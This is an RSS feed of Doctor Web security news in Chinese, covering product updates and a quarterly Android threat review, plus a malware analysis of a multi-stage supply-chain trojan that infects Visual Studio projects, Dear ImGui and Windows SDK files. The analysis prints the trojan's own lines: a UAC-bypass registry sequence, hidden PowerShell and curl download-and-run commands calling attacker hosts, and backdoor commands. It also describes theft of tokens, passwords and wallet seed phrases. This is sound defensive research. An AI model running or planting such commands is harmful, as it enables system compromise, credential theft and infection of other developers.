<?xml version="1.0"?>
<rss version="2.0"><channel><title>Doctor Web公司新闻</title><link>https://news.drweb.cn/news/</link><description>Doctor Web公司新闻 - Doctor Web公司新闻</description><image><url>https://st.drweb.com/static/drweb_logo_cn.gif</url><link>https://news.drweb.cn/news/</link><title>Dr.Web大蜘蛛反病毒软件</title></image><item><guid>https://news.drweb.cn/show/?i=15291&amp;lng=cn</guid><title>Dr.Web Enterprise Security Suite和Dr.Web Industrial统一管理服务器更新</title><link>https://news.drweb.cn/show/?i=15291&amp;lng=cn&amp;c=5</link><pubDate>Thu, 30 Jul 2026 09:59:37 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web公司发布Dr.Web Enterprise Security Suite和Dr.Web Industrial套装服务器更新，版本号为13.0.1.202606110。2026年7月27日起可利用管理控制台网页界面下载新版。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;更新内容&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;此次发布的更新主要是进一步提高管理中心的运行稳定性，并消除了之前发现的错误，具体是解决了反病毒网络树结构筛选过程中出现的子元素显示问题，以及向管理员发送预警和生成报告时出现的错误。完整变更列表请参见&lt;a href="https://news.drweb.cn/changelog/"&gt;Changelog&lt;/a&gt;。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;对代理端的影响（包括Dr.Web Industrial的代理端）&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;服务器更新不会影响受保护节点上代理端的运行。服务器组件更新无需重启或重新设置代理端软件，代理端会继续正常运行。对于Dr.Web Industrial所运行的工业环境而言，代理端的运行不会发生任何变化，因为所有更新内容仅涉及服务器端和管理界面。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;重要提示：&lt;/strong&gt;Dr.Web服务器在安装更新期间将自动重启。建议提前将更新操作安排在负载最低的时间段进行。&lt;/p&gt;&lt;p&gt;再次提请您注意及时更新，这对于保证安全防护等级和软件最佳功能都至关重要。&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15284&amp;lng=cn</guid><title>Dr.Web Enterprise Security Suite与Dr.Web订阅版反垃圾邮件组件更新</title><link>https://news.drweb.cn/show/?i=15284&amp;lng=cn&amp;c=5</link><pubDate>Wed, 15 Jul 2026 17:04:51 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web公司发布Dr.Web Enterprise Security Suite及Dr.Web 订阅版中的反垃圾邮件模块版本1.1.2.202604160的更新，用户自 2026 年 7 月 20 日起可下载。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;这一模块对邮件流量进行实时检查并分析电子邮件的各个组成部分：标题、正文、超链接及附件。组件的运行经过平衡优化，不会降低邮件客户端的性能。&lt;br&gt;新版本改进了垃圾邮件侦测和链接解析功能，同时进行了内部调整。此前已发布的重大更新显著提升对不良流量进行识别与过滤的效率。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;特别提醒 Windows XP 用户注意&lt;/strong&gt;，如果您启用了“仅更新病毒库”选项，插件Dr.Web for Microsoft Outlook将无法正常工作：所有收件邮件均会被侦测为垃圾邮件。检查设置的方法：在程序设置中选择“更新”，然后点击“高级设置”，打开“可更新组件”部分。&lt;/p&gt;&lt;p&gt;建议Windows XP操作系统用户将系统升级至更高版本，或在设置中启用“更新所有程序模块”选项，而不是只更新病毒库。&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15285&amp;lng=cn</guid><title>Dr.Web 软件产品用户许可协议更新</title><link>https://news.drweb.cn/show/?i=15285&amp;lng=cn&amp;c=5</link><pubDate>Wed, 15 Jul 2026 14:43:47 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web 公司更新 Dr.Web 软件产品用户许可协议。查阅更新后的协议文档请使用链接 &lt;a href=" https://license.drweb.com/agreement/"&gt;https://license.drweb.com/agreement/&lt;/a&gt;.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;变更内容如下：&lt;/p&gt;&lt;ul&gt;&lt;li&gt;文本结构优化，按主题区分章节，便于浏览导航；&lt;/li&gt;&lt;li&gt;增加术语定义，帮助更好理解协议内容，避免错误解读；&lt;/li&gt;&lt;li&gt;明确授权使用Dr.Web 软件产品的与非授权使用之间的区别；&lt;/li&gt;&lt;li&gt;就用户常见问题作出说明：所购授权可在哪些设备使用、受保护设备是否必须为自有财产及其他类似问题。&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;自新版许可协议生效后，继续使用 Dr.Web 软件产品即表示您完全接受新条款。如不同意相关变更，您需从设备删除 Dr.Web 软件。&lt;/p&gt;&lt;p&gt;要提请您注意的是，本文本适用于 Dr.Web 系列所有软件产品，但另具单独许可协议的两款产品Dr.Web FixIt! 和 Dr.Web vxCube 除外。&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15276&amp;lng=cn</guid><title>瞄准开发商：新型木马通过供应链感染电脑造成多重损害</title><link>https://news.drweb.cn/show/?i=15276&amp;lng=cn&amp;c=5</link><pubDate>Fri, 10 Jul 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;我公司反病毒实验室专家对一种新型木马程序进行了研究。这一新威胁属于供应链攻击（supply chain attack），其显著特征是针对使用C++和C#编程语言项目，另一特征为危险性极高，多种破坏因素组合出击，可同时执行多项恶意功能：信息窃取、剪贴板劫持、后门、挖矿以及成为文件感染源。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;该木马传播首批案例出现在2025年第四季度，此后攻击者持续对其进行修改，主要通过互联网经由被感染的.exe和Python文件传播。感染过程分为多个阶段，接下来我们将逐一分析各阶段流程及其目的。&lt;/p&gt;&lt;h3&gt;阶段1：Trojan.DownLoader49.35384&lt;/h3&gt;&lt;p&gt;Doctor Web专家发现大量被感染的合法应用程序具有相似结构：其原始可执行文件中被添加了一个全局对象，木马化应用开始执行时都利用PEB walking方法获取系统API访问权限。随后标准函数initterm遍历函数指针表并将其初始化，而其中一个函数为恶意函数，用于启动PowerShell命令。某些木马版本中该载荷进行了加密。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;通过initterm启动&lt;/i&gt;&lt;/p&gt;&lt;p&gt;PowerShell命令下载并执行恶意文件&amp;nbsp;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader49.35687&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;，也就是启动第二阶段。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;恶意PowerShell命令&lt;/i&gt;&lt;/p&gt;&lt;p&gt;除可执行文件外，还发现了一些Python文件（&lt;strong&gt;Python.Downloader.255&lt;/strong&gt;）。这些文件中包含相同的恶意代码，通过Fernet对称加密机制加密，并使用了简单的混淆手段（第一行大量空格）。此类情况同样分多个阶段执行。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;恶意Python文件&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;阶段2：Trojan.DownLoader49.35687&lt;/h3&gt;&lt;p&gt;在此阶段木马&amp;nbsp;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader49.35687&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;首先检测自身运行环境是否是沙箱。此外会创建名为Global\PFNMX（固定值）的同步对象mutex，例如：&lt;span class="string"&gt;\Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008&lt;/span&gt;。木马通过这种方式来检查电脑上是否已有其他副本在运行。&lt;/p&gt;&lt;p&gt;第二阶段木马还尝试通过公共代码仓库GitHub和游戏平台Steam获取C2服务器地址。攻击者在上述平台存储相应域名，木马读取后用于下载第三阶段负载，也就是木马 &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;。&lt;/p&gt;&lt;p&gt;攻击者创建的Steam账号包含明文域名。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;包含C2域名的Steam账号&lt;/i&gt;&lt;/p&gt;&lt;p&gt;在GitHub上C2域名则是以加密的raw文件形式保存：&lt;span class="string"&gt;raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine&lt;/span&gt;。木马下载该文件后先通过Base64解密，再使用密钥ZwFlushKey进行XOR解密。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;加密域名&lt;/i&gt;&lt;/p&gt;&lt;p&gt;下载后，&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader49.35687&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;将其注入到&lt;span class="string"&gt;C:\Windows\System32&lt;/span&gt;目录下41个预置可执行文件中的一个文件。&lt;/p&gt;&lt;p&gt;如C2域名能够成功连接，地址就会添加到木马内置的硬编码字符串中，并通过命名管道pipe\VccFramework传递给下一阶段。&lt;/p&gt;&lt;h3&gt;阶段3：BackDoor.Siggen2.5906&lt;/h3&gt;&lt;p&gt;此阶段执行主要的恶意活动。&lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; 创建名为Global\PFNX_Side（固定值）的同步对象mutex。随后通过此前创建的管道从第二阶段获取数据，从中提取木马标识符以及 &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; 进行通信的C2域名。&lt;/p&gt;&lt;p&gt;为达到在系统中持久驻留的目的，木马会下载文件“bungee.boo”（该文件执行阶段2的功能——&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader49.35687&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;），并替换以下DLL文件：&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;Discord应用程序的“profapi.dll”；&lt;/li&gt;&lt;li&gt;Microsoft Edge应用程序“Domain Actions”文件夹中的“domain_actions.dll”及“Well Known Domains”文件夹中的“well_known_domains.dll”；&lt;/li&gt;&lt;li&gt;“C:\Windows\omadmapi.dll”。&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;此外，&lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; 还可修改Windows系统注册表，以便在通过WinRar.exe打开压缩文件时会启动恶意代码。&lt;/p&gt;&lt;p&gt;木马使用UAC绕过技术来执行需要管理员权限的操作：生成一个由随机数字命名的.vbs文件，并在其中写入以管理员权限执行的命令。随后通过cmd.exe运行以下命令：&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;随后木马就能实施5类恶意功能：信息窃取、剪贴板劫持、后门、挖矿和成为文件感染源。&lt;/p&gt;&lt;h3&gt;信息窃取&lt;/h3&gt;&lt;p&gt;木马能够窃取多种信息：&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;Discord令牌，用于无需输入用户名/密码即可登录他人账户；&lt;/li&gt;&lt;li&gt;来自Chrome、Edge、Opera、Brave、Yandex等浏览器的密码和Cookie。除常规数据提取技术外，还利用CCCWF.tmp文件（&lt;strong&gt;Trojan.PWS.Siggen5.33623&lt;/strong&gt;），将其注入浏览器后读取密码并保存至文本文件；&lt;/li&gt;&lt;li&gt;Telegram Desktop文件夹；&lt;/li&gt;&lt;li&gt;Exodus加密货币钱包文件夹。&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;除窃取Exodus钱包文件夹外，木马还会修改加密货币钱包。具体方法是找到app.asar文件，将其替换为通过curl从&lt;span class="string"&gt;balista[.]lol/Stb/PokerFace/RTApp[.]txt&lt;/span&gt;下载的副本。替换版本中的index.js文件（&lt;strong&gt;Trojan.Siggen32.44702&lt;/strong&gt;）内包含unlock()函数，钱包启动时该函数会将助记词短语发送至攻击者服务器。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;被替换的index.js文件&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;剪贴板劫持器&lt;/h3&gt;&lt;p&gt;这是该木马极具危险性的功能之一。恶意程序会持续监控用户剪贴板：查找银行卡数据并发送至攻击者服务器。同时，木马还会将加密货币钱包地址替换为从C2服务器获取的虚假地址。&lt;/p&gt;&lt;h3&gt;后门&lt;/h3&gt;&lt;p&gt;这一功能让攻击者能够通过以下命令远程控制被感染的电脑：&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;exc&lt;/td&gt;&lt;td&gt;利用curl从URL下载文件并执行&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RVRS&lt;/td&gt;&lt;td&gt;启动反向代理（Reverse Proxy）&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RUNCMD&lt;/td&gt;&lt;td&gt;通过cmd运行命令&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;GETFILE&lt;/td&gt;&lt;td&gt;将指定文件内容上传至控制服务器&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;LISTDIR&lt;/td&gt;&lt;td&gt;将电脑中指定目录下的文件列表发送至控制服务器&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;TROLL&lt;/td&gt;&lt;td&gt;执行骚扰用户的命令，选项包括：earrape、scary_sound、rickroll、mute_audio、jumpscare_screamer等&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;h3&gt;挖矿程序&lt;/h3&gt;&lt;p&gt;木马通过curl从服务器下载并执行文件&lt;span class="string"&gt;https://files[.]catbox[.]moe/lvh9j3[.]bin&lt;/span&gt;&amp;nbsp;— &lt;strong&gt;Trojan.Packed2.50953&lt;/strong&gt;。其结构与行为类似前面描述的阶段2，区别在于下载并注入的是 &lt;strong&gt;Trojan.BtcMine.3956&lt;/strong&gt; 而非 &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;。这个挖矿程序只会在用户设备闲置一定时间后才会启动。恶意程序使用开源工具 &lt;a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener"&gt;XMRig&lt;/a&gt;、&lt;a href="https://github.com/trexminer/T-Rex" target="_blank" rel="noopener"&gt;T-Rex&lt;/a&gt; 和 &lt;a href="https://github.com/todxx/teamredminer/releases" target="_blank" rel="noopener"&gt;TeamRedMiner&lt;/a&gt;。&lt;/p&gt;&lt;h3&gt;感染文件&lt;/h3&gt;&lt;p&gt;新木马最显著的特征在于会感染文件并进一步自我传播。被感染的文件列表包括：&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;imgui_impl_win32.cpp,&lt;/li&gt;&lt;li&gt;.suo,&lt;/li&gt;&lt;li&gt;.exe,&lt;/li&gt;&lt;li&gt;winnetwk.h (Windows SDK),&lt;/li&gt;&lt;li&gt;.vcxproj 和 .csproj.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;木马通过遍历磁盘并执行命令来定位可感染文件的路径，以A盘为例：&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj &amp;gt; %ALLUSERSPROFILE%\ADat.bin3290.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;攻击者的意图在于，包含恶意代码的应用开发者会公开发布。其他开发者在构建、编译或修改这些项目时会因.suo、.vcxproj和.csproj文件而自动感染其自身的电脑，而被入侵的开发工具所创建的可执行文件已被感染，普通用户一旦运行其设备也就会被感染。&lt;/p&gt;&lt;h3&gt;imgui_impl_win32.cpp. Trojan.Loader.3129&lt;/h3&gt;&lt;p&gt;&lt;span class="string"&gt;imgui_impl_win32.cpp&lt;/span&gt;是常用C++图形界面库Dear ImGui的组成部分。木马在该文件中注入两行代码：第一行包含载荷，第二行启动该载荷。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;含载荷的代码行&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;启动载荷的代码行&lt;/i&gt;&lt;/p&gt;&lt;p&gt;最终执行的命令为：&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "&amp;amp; { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;这个库被感染后，其使用者创建的任何C++应用程序都将包含恶意代码。而此类应用程序分发或下载就会使感染进一步扩散。&lt;/p&gt;&lt;h3&gt;.suo. Trojan.Loader.3138&lt;/h3&gt;&lt;p&gt;是Microsoft Visual Studio开发环境的文件扩展名，用于存储特定项目的用户配置。木马将原始文件替换为从C2获取的被感染文件。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;被感染文件&lt;/i&gt;&lt;/p&gt;&lt;p&gt;其结果是在Visual Studio中打开项目时，恶意代码就会启动：&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" &amp;amp;&amp;amp; start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3&gt;winnetwk.h. Trojan.Loader.3184&lt;/h3&gt;&lt;p&gt;Windows SDK 是Microsoft官方开发工具包，用于创建Windows操作系统应用程序。&lt;/p&gt;&lt;p&gt;木马通过注册表找到Windows SDK安装目录，在其中搜索负责网络资源操作的&lt;span class="string"&gt;winnetwk.h&lt;/span&gt;文件，然后添加恶意代码。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;被感染的winnetwk.h文件&lt;/i&gt;&lt;/p&gt;&lt;p&gt;此后，所有使用winnetwk.h创建的程序都将包含会启动阶段2的恶意代码。&lt;/p&gt;&lt;h3&gt;.exe文件&lt;/h3&gt;&lt;p&gt;木马搜索合适的.exe文件，向其中注入API初始化函数和initterm启动函数。随后该文件就开始充当&amp;nbsp;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader49.35384&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;（即阶段1）。&lt;/p&gt;&lt;h3&gt;.vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) 和 .csproj (Trojan.Loader.3126)文件&lt;/h3&gt;&lt;p&gt;这些是Visual Studio的C++和C#项目文件。木马在其中添加在每次项目构建前执行的PreBuildEvent命令。早期版本的木马添加的代码与阶段1类似。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;早期版本代码&lt;/i&gt;&lt;/p&gt;&lt;p&gt;在新版本中，代码进行了混淆，变得更加复杂。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;新版本代码&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;执行&lt;strong&gt;Trojan.Loader.3128&lt;/strong&gt;的一个阶段&lt;/i&gt;&lt;/p&gt;&lt;p&gt;恶意命令执行后，会写入一个恶意的.vbs文件，由这个文件启动PowerShell载荷。木马会向以下URL发起请求：&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;youtu.be/akoxddx6lgc,&lt;/li&gt;&lt;li&gt;steamcommunity.com/profiles/76561198737324192.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;这些地址上存储的是另一个经base64加密的URL。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;包含加密URL的YouTube账号&lt;/i&gt;&lt;/p&gt;&lt;p&gt;解密后，木马获得C2域名，并向其请求下载与阶段2类似的载荷。&lt;/p&gt;&lt;p&gt;对新木马工作原理的分析表明，由于木马融合了多项恶意功能，危害程度极高。为避免电脑感染及木马进一步传播，建议定期更新反病毒数据库并检查所有从互联网下载的文件。Dr.Web反病毒产品能够可靠侦测并清除这一新威胁，.vcxproj、.csproj和imgui等类型文件中的恶意代码也可被清除，因此Dr.Web Security Space和Dr.Web Desktop Security Suite反病毒产品的用户无需担忧。&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15274&amp;lng=cn</guid><title>Doctor Web：2026年第二季度移动设备病毒活动综述</title><link>https://news.drweb.cn/show/?i=15274&amp;lng=cn&amp;c=5</link><pubDate>Wed, 01 Jul 2026 04:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;根据Dr.Web Security Space移动设备保护产品的侦测统计数据，2026年第二季度，&lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 银行木马的活动量与第一季度相比下降了31.83%，但仍是安卓平台最常见的恶意软件，占相应威胁类型侦测总量的23.28%。这些恶意程序能够窃取各种敏感数据，包括信贷机构的一次性验证码短信、网银账户的登录名和密码，还会显示钓鱼窗口。与上一季度一样，用户最常遭遇的是其包含多种恶意应用的子家族Android.Banker.Mamont。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;在过去的三个月 &lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 广告木马家族的活动量持续下降，但仍然是最常见的安卓恶意应用之一，其个别变种在恶意软件侦测量排行中仍居前。&lt;/p&gt;

&lt;p&gt;通过添加垃圾代码混淆逻辑的程序再次成为最常见的风险软件（占比超过66%，被侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Tool.Obfuscator.TrashCode&amp;lng=cn"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;），修改利用的是黑客工具NP Manager完成。这类工具攻击者也常使用，比如用于保护银行木马&lt;b&gt;Android.Banker.Mamont&lt;/b&gt; 等恶意软件躲避反病毒软件的侦测。&lt;/p&gt;

&lt;p&gt;排名第二的仍然是经NP Manager工具其他功能修改过的应用，如该工具可提供多种用于代码保护和混淆的模块，以及让修改后的应用能绕过数字签名验证的模块。病毒编写者利用这些功能来保护恶意软件免遭反病毒软件查杀。Dr.Web反病毒产品将此类修改后的程序侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Tool.NPMod&amp;lng=cn"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;在最常见的潜在危险应用中再次出现了使用 &lt;a href="https://vms.drweb.cn/search/?q=Tool.LuckyPatcher&amp;lng=cn"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt; 工具修改的程序。该工具会从互联网下载专门的脚本来进行应用修改。&lt;/p&gt;

